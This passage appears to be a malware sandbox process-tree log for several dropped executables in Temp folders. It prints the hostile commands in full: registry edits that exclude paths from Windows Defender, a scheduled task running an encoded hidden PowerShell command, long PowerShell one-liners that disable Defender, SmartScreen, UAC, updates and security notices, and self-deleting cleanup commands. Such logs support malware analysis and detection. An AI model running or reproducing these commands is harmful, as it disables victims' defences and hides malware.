    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EvBjrtBtUyzDC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:9428
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EvBjrtBtUyzDC" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:3808
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EvBjrtBtUyzDC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:9712
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TZXwQNgcU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:9872
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TZXwQNgcU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:8712
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mDMOhBxZSaUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:8916
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mDMOhBxZSaUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:9068
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nZosbjLfGLdU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:10024
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nZosbjLfGLdU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:8652
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ogqTxBaMVNngTiWEorR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5172
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ogqTxBaMVNngTiWEorR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:9920
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\otlZYwPmfIE" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:6716
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\otlZYwPmfIE" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:9592
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\achrhaRRbsGknaVB /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:8352
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\achrhaRRbsGknaVB /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:10004
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\LocalLow\hnfSyQJANMfJn /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1496
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\LocalLow\hnfSyQJANMfJn /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:3280
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\QPVXDrhIkhHCtwmZO /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:9332
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\QPVXDrhIkhHCtwmZO /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:9020
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ptSbhgFrGptQLEdh /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4656
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ptSbhgFrGptQLEdh /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:9684
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gQTsjvOVK" /SC once /ST 06:27:58 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Creates scheduled task(s)
  PID:3828
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gQTsjvOVK"
  2⤵
  PID:8124

C:\Users\Admin\AppData\Local\Temp\76FA.tmp.exe
C:\Users\Admin\AppData\Local\Temp\76FA.tmp.exe
1⤵
PID:6532
- C:\Users\Admin\AppData\Local\Temp\76FA.tmp.exe
  "C:\Users\Admin\AppData\Local\Temp\76FA.tmp.exe"
  2⤵
  PID:8864
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell.exe" $key='HKLM:\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'PreventOverride' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'EnabledV9' -Value 0; $key='HKLM:\SOFTWARE\Policies\Microsoft\PCHealth\ErrorReporting';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'IncludeShutdownErrs' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'AllOrNone' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'IncludeMicrosoftApps' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'Disabled' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'IncludeWindowsApps' -Value 0; $key='HKLM:\SOFTWARE\Microsoft\Windows\Windows Error Reporting';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'Disabled' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'DontShowUI' -Value 1; $key='HKCU:\SOFTWARE\Microsoft\Windows\Windows Error Reporting';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'Disabled' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'DontShowUI' -Value 1; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'Scan_ScheduleDay' -Value 8; New-ItemProperty -Path $key -Force -Verbose -Name 'LocalSettingOverrideScan_ScheduleTime' -Value 0; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableEnhancedNotifications' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableGenericRePorts' -Value 1; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableBlockAtFirstSeen' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'LocalSettingOverrideSpynetReporting' -Value 0; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'SpynetReporting' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'SubmitSamplesConsent' -Value 2; $key='HKLM:\software\microsoft\Security Center';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'AntiVirusDisableNotify' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'FirewallDisableNotify' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'UpdatesDisableNotify' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'UacDisableNotify' -Value 1; $key='HKLM:\software\Policies\Microsoft\MRT';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'DontReportInfectionInformation' -Value 1; $key='HKLM:\Software\Policies\Microsoft\Windows\WindowsUpdate';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose};New-ItemProperty -Path $key -Name 'DisableWindowsUpdateAccess' -Value 1 -Force -Verbose; New-ItemProperty -Path $key -Name 'SetDisableUXWUAccess' -Value 1 -Force -Verbose; New-ItemProperty -Path $key -Name 'DoNotConnectToWindowsUpdateInternetLocations' -Value 1 -Force -Verbose;New-ItemProperty -Path $key -Name 'DisableOSUpgrade' -Value 1 -Force -Verbose; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'NoAutoUpdate' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'EnableFeaturedSoftware' -Value 0; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'AllowFastServiceStartup' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableAntiSpyware' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'ServiceKeepAlive' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableAntiVirus' -Value 1; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'PUAProtection' -Value 0; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'MpEnablePus' -Value 0; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableRealtimeMonitoring' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableBehaviorMonitoring' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableIOAVProtection' -Value 1; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableOnAccessProtection' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableRawWriteNotification' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableScanOnRealtimeEnable' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableBlockAtFirstSeen' -Value 1; $key='HKLM:\SOFTWARE\Microsoft\Windows Defender';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableAntiSpyware' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableAntiVirus' -Value 1; $key='HKLM:\SOFTWARE\Policies\Microsoft\System';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'EnableSmartScreen' -Value 0; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Features';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'TamperProtection' -Value 0; $key='HKLM:\SOFTWARE\Microsoft\Windows Defender';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'ProductStatus' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'ManagedDefenderProductType' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableRoutinelyTakingAction' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'OneTimeSqmDataSent' -Value 1; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Scan';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'ScanParameters' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'ScheduleDay' -Value 8; $key='HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'TaskbarNoNotification' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'HideSCAHealth' -Value 1; $key='HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'SmartScreenEnabled' -Type String -Value 'Off'; Set-ItemProperty 'HKLM:\software\microsoft\windows\currentversion\Explorer' -Force 'DisableNotificationCenter' -Value 1; Remove-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Force -Verbose SecurityHealth -ErrorAction SilentlyContinue;
    3⤵
    PID:9876
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell.exe" Remove-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Force -Verbose WindowsDefender -ErrorAction SilentlyContinue; Remove-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Force -Verbose 'Windows Defender' -ErrorAction SilentlyContinue; Remove-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Force -Verbose MSC -ErrorAction SilentlyContinue; Remove-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Force -Verbose AvastUI.exe -ErrorAction SilentlyContinue; Remove-ItemProperty 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Force -Verbose SecurityHealth -ErrorAction SilentlyContinue; Remove-ItemProperty 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Force -Verbose MSC -ErrorAction SilentlyContinue; Remove-ItemProperty 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Force -Verbose WindowsDefender -ErrorAction SilentlyContinue; Remove-ItemProperty 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Force -Verbose 'Windows Defender' -ErrorAction SilentlyContinue; Remove-ItemProperty 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Force -Verbose AvastUI.exe -ErrorAction SilentlyContinue; $key='HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'Enabled' -Value 0; $key='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'Enabled' -Value 0; $key='HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\Maintenance';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'MaintenanceDisabled' -Value 1; $key='HKCU:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\Maintenance';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'MaintenanceDisabled' -Value 1; $key='HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'Enabled' -Value 0; $key='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'Enabled' -Value 0; $key='HKLM:\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'EnabledV9' -Value 0; $key='HKCU:\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'EnabledV9' -Value 0; $key='HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'Enabled' -Value 0; $key='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'Enabled' -Value 0; $key='HKLM:\software\microsoft\windows\currentversion\AppHost';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'EnableWebContentEvaluation' -Value 0; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows\DataCollection';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'AllowTelemetry' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'DoNotShowFeedbackNotifications' -Value 1; $key='HKLM:\SOFTWARE\Microsoft\Personalization\Settings';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'AcceptedPrivacyPolicy' -Value 0; $key='HKLM:\SYSTEM\CurrentControlSet\Control\WMI\AutoLogger\AutoLogger-Diagtrack-Listener';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'Start' -Value 0; $key='HKLM:\SOFTWARE\Microsoft\Input\TIPC';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'Enabled' -Value 0; $key='HKLM:\Software\Microsoft\Internet Explorer\PhishingFilter';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'EnabledV8' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'EnabledV9' -Value 0; $key='HKLM:\software\microsoft\windows\currentversion\policies\system';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'EnableLUA' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'ConsentPromptBehaviorAdmin' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'PromptOnSecureDesktop' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'EnableInstallerDetection' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'ConsentPromptBehaviorUser' -Value 3; New-ItemProperty -Path $key -Force -Verbose -Name 'EnableSecureUIAPaths' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'ValidateAdminCodeSignatures' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'EnableVirtualization' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'EnableUIADesktopToggle' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'FilterAdministratorToken' -Value 0; $key='HKLM:\SYSTEM\CurrentControlSet\Control\WMI\AutoLogger\SQMLogger';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'Start' -Value 0; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows\AppCompat';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'AITEnable' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableUAR' -Value 1; $key='HKLM:\SOFTWARE\Microsoft\InputPersonalization';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'RestrictImplicitInkCollection' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'RestrictImplicitTextCollection' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'HarvestContacts' -Value 0; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows\TabletPC';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'PreventHandwritingDataSharing' -Value 1; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows\HandwritingErrorReports';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'PreventHandwritingErrorReports' -Value 1; $key='HKLM:\SOFTWARE\Policies\Microsoft\SQMClient\Windows';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'CEIPEnable' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'CorporateSQMURL' -Value '0.0.0.0';
    3⤵
    PID:9292
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell.exe" $key='HKLM:\SOFTWARE\Policies\Microsoft\Office\16.0\osm';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'Enablelogging' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'EnableUpload' -Value 0; $key='HKLM:\SOFTWARE\Microsoft\Siuf\Rules';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'NumberOfSIUFInPeriod' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'PeriodInNanoSeconds' -Value 0; $key='HKLM:\SOFTWARE\Policies\Microsoft\Assistance\Client\1.0';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'NoExplicitFeedback' -Value 1; $key='HKLM:\SOFTWARE\Microsoft\MediaPlayer\Preferences';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'UsageTracking' -Value 0;
    3⤵
    PID:412

C:\Users\Admin\AppData\Local\Temp\7DB1.exe
C:\Users\Admin\AppData\Local\Temp\7DB1.exe
1⤵
PID:5684
- C:\Windows\SysWOW64\icacls.exe
  icacls "C:\Users\Admin\AppData\Local\cd3ee7f0-10a0-44af-ab92-b84fbc1a2af2" /deny *S-1-1-0:(OI)(CI)(DE,DC)
  2⤵
  - Modifies file permissions
  PID:8296
- C:\Users\Admin\AppData\Local\Temp\7DB1.exe
  "C:\Users\Admin\AppData\Local\Temp\7DB1.exe" --Admin IsNotAutoStart IsNotTask
  2⤵
  PID:1368
- - C:\Users\Admin\AppData\Local\7734955b-1003-4d2a-bf9a-b637e480434d\updatewin.exe
    "C:\Users\Admin\AppData\Local\7734955b-1003-4d2a-bf9a-b637e480434d\updatewin.exe"
    3⤵
    PID:5416
  - - C:\Windows\SysWOW64\cmd.exe
      /c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Local\7734955b-1003-4d2a-bf9a-b637e480434d\updatewin.exe
      4⤵
      PID:9476
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 3
        5⤵
        Delays execution with timeout.exe
        
        PID:10040
- - C:\Users\Admin\AppData\Local\7734955b-1003-4d2a-bf9a-b637e480434d\5.exe
    "C:\Users\Admin\AppData\Local\7734955b-1003-4d2a-bf9a-b637e480434d\5.exe"
    3⤵
    PID:8884
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c taskkill /im 5.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\7734955b-1003-4d2a-bf9a-b637e480434d\5.exe" & del C:\ProgramData\*.dll & exit
      4⤵
      PID:3096
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im 5.exe /f
        5⤵
        Kills process with taskkill
        
        PID:9768

C:\Users\Admin\AppData\Local\Temp\818B.tmp.exe
C:\Users\Admin\AppData\Local\Temp\818B.tmp.exe
1⤵
PID:6848

C:\Users\Admin\AppData\Local\Temp\B454.tmp.exe
C:\Users\Admin\AppData\Local\Temp\B454.tmp.exe
1⤵
PID:8480

C:\Users\Admin\AppData\Local\Temp\B81D.exe
C:\Users\Admin\AppData\Local\Temp\B81D.exe
1⤵
PID:8372
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c taskkill /im B81D.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\B81D.exe" & del C:\ProgramData\*.dll & exit
  2⤵
  PID:8688
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im B81D.exe /f
    3⤵
    - Kills process with taskkill
    PID:3712
- - C:\Windows\SysWOW64\timeout.exe
    timeout /t 6
    3⤵
    - Delays execution with timeout.exe
    PID:8748

C:\Users\Admin\AppData\Local\Temp\C1B4.tmp.exe
C:\Users\Admin\AppData\Local\Temp\C1B4.tmp.exe
1⤵
PID:8720

C:\Users\Admin\AppData\Local\Temp\C975.tmp.exe
C:\Users\Admin\AppData\Local\Temp\C975.tmp.exe
1⤵
PID:8952

C:\Users\Admin\AppData\Local\Temp\CF04.tmp.exe
C:\Users\Admin\AppData\Local\Temp\CF04.tmp.exe
1⤵
PID:224

C:\Users\Admin\AppData\Local\Temp\D84C.tmp.exe
C:\Users\Admin\AppData\Local\Temp\D84C.tmp.exe
1⤵
PID:5988

C:\Users\Admin\AppData\Local\Temp\DCE1.tmp.exe
C:\Users\Admin\AppData\Local\Temp\DCE1.tmp.exe
1⤵
PID:6312

C:\Users\Admin\AppData\Local\Temp\E464.tmp.exe
C:\Users\Admin\AppData\Local\Temp\E464.tmp.exe
1⤵
PID:6744
- C:\Users\Admin\AppData\Local\Temp\E464.tmp.exe
  "C:\Users\Admin\AppData\Local\Temp\E464.tmp.exe"
  2⤵
  PID:4284

C:\Windows\SysWOW64\explorer.exe
